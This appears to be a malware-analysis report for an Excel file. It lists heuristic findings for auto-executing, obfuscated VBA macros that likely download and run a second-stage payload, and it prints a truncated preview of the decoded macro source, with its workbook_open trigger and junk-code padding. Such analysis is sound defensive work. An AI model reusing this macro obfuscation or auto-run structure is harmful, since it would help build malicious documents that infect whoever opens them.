MALICIOUS
202
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1204.002 Malicious File
This Excel document contains obfuscated VBA macros that are triggered by the Workbook_Open event. The macros utilize Shell() and CreateObject() calls, indicating an intent to execute arbitrary code. The primary function appears to be downloading and executing a second-stage payload, though the specific payload and its destination are not directly discernible from the provided obfuscated script.
Heuristics 6
-
VBA macros detected medium 4 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
Shell() call in VBA critical OLE_VBA_SHELLShell() call in VBA
-
Workbook_Open macro high OLE_VBA_WBOPENWorkbook_Open macro
-
CreateObject call high OLE_VBA_CREATEOBJCreateObject call
-
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECCompiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
-
Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGEOne or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 15884 bytes |
SHA-256: 80ae821ed77b3c045b205b5d3ee00e69e54d91a87fd3c6f0a8fd994c2ffee173 |
|||
|
Detection
ClamAV:
No threats found
Obfuscation or payload:
likely
Carved artifact contains 4 long base64-like blob(s).
|
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Private Sub workbook_open()
EsnBOcAXzEqOM.leewl3ElmMbJRP8Q1sVf
While 25 = 554
Dim zv7nF7RKrc_hXyifjIrZltr8tsMM31EoN4Ozgzpnj43HH3vc As Variant
Wend
Dim qZqq_63EC8 As Integer
While 8 = 8567
Dim VsDQ1WXSdhr9scCzrziyz7sfbIXnR_ As Variant
Wend
Dim Ivi6R5fkBt As Integer
While 15 = 399
Dim tiP58a7L7EJNcHCY9fyp9s_cX6XwJGSEwxDPoxg_LKqLy4QY32 As Variant
Wend
Dim uUt_hweBBIAxv As Integer
While 3 = 9377
Dim DanDutI9xbwAwmcm84RKSTaDDq1Qe7CI2YubmUFFu_6278uHB As Variant
Wend
Dim XCNqlas9j_D2 As Integer
While 20 = 8776
Dim b1YlHV2__lvJYSWhE_6rOF4waN8AbBUCN3f_bSyWOAWZbfLF As Variant
Wend
Dim TZd4FIkU6lI3 As Integer
While 20 = 4955
Dim X1g7Ps6fwQEuOgaNrcT5BzoBgZ5DQJGyH69XcZHrjpS As Variant
Wend
Dim CTrniqUlbQNzgJd As Integer
While 23 = 2751
Dim Yyx1MlHOkShBtQSkSUflqxvUV5gog4_ZM8_R3saq3DET_nkTHo4dAgwjCbc As Variant
Wend
Dim RDcqqMFxvQ As Integer
While 18 = 4756
Dim Aqj3xslqaTqSKf29iYpJXOZNHlXUXE3 As Variant
Wend
Dim zyCG7SjKwJ2jFv As Integer
While 23 = 5224
Dim yqnpGk2tPUtJSORUazdHX5o8M29enRaIt As Variant
Wend
Dim afpZKrMIVp8z As Integer
While 10 = 2462
Dim c4iNo6crh4BobOkUE73jZ2sl4OGP8ANpGLW_6XmeoB2lm As Variant
Wend
Dim tsakxOrDNik As Integer
While 17 = 6369
Dim J7SYwLtfoTgN1eYpRW4W9E8HfonItel2mv49_MqaQT7QLcjEWiX As Variant
Wend
Dim pTJkD8J2Fhiu As Integer
While 2 = 2738
Dim HrnkDkZk_oaEmHo5B_huJE5gaJy_3Ti3qiwih1ec77 As Variant
Wend
Dim S_2_75QNyB_x As Integer
End Sub
Attribute VB_Name = "Sheet1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Name = "Sheet2"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Name = "Sheet3"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Name = "EsnBOcAXzEqOM"
Dim QV91Cr7RUw_t89QUllnbhTYWVk8v_CShapQilhOWXHpUcQcc9_ As String
Function jBvEI3vYqs_hXDTEVJhDwLv5oUL4q(qaQWHQV7ZkDdU1BeBdp67PGJApMLWXHiM9C6uyAWi7XDaCW1YRnIj6lZSEUaCHiBbcPVx_sKb)
While 16 = 8235
Dim tmohretdT23tIL5aB_gR7F2VSwwWDAZc2y As Variant
Wend
Dim rEBppWBLUe As Integer
While 13 = 3755
Dim gWLrrbaZ9ytmtQN5qVZSaY1ScxXTXHPttVy6i_ As Variant
Wend
Dim okh_cB__Tsauoov As Integer
While 2 = 7897
Dim ACGf2N3CFByh_2WbQTlpxua5xNWbn3lcj As Variant
Wend
Dim sRpYpyvgZ8nc_K7 As Integer
Dim Xv_odUKJvqlnwkjcg_NGmaZT3_e5JwFUjlDIg4DkoDKt7_FXFbKpW4X7TovcyP_8iOCJgZ6l6maiOoW33FxqjZ8pLEx1FiuXDLJp65zofhssbxqoQ3j
While 15 = 8616
Dim PHYC87OkLqmzZXMXU8AHDv2mv4OScPTIJeWsKYlAbqcqC As Variant
Wend
Dim THKhQdCC2c As Integer
While 9 = 8639
Dim OvODp5F6Vbn5_dK5U_oVQJjvhFG48yFGl3bYHg As Variant
Wend
Dim SgigTjSYHq As Integer
While 12 = 4111
Dim UUHBWeJ_KcdiwL7fUfQFAvvwoFvty9bG8YgloDsFqVMoBttViwM As Variant
Wend
Dim wGAphiUVOrZOK_V As Integer
Dim gDtsfqatlZAEXHg7hCrbr2GeSm2GYEyrlRkdy8zqhQ9K7WEN_2PyD7yo6MY3ySSfkRc_fBGiL_3Y35g5flGgx9nob6hjh72N8bin4Aq7tqlCC
While 20 = 148
Dim kWnT1PvIXmhEt5VYIBto_6r8BSqcXPFAnoHVqN57_8lB_ As Variant
Wend
Dim bjZ3QOLZTUon As Integer
While 20 = 2626
Dim pQfiRuGegZ_v_r5EwnARo8hrOjE_4jSRcq_6WVqLdfbBen2iSE As Variant
Wend
Dim loTU9qrxRqnF As Integer
While 3 = 4585
Dim k6FuQQq8qZ7xxHefLkqfpw7m8GrQLiC9gV4e5sVj1TXKrefyKKjq9GZ As Variant
Wend
Dim w9bvIiYuFV7O
... (truncated)
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.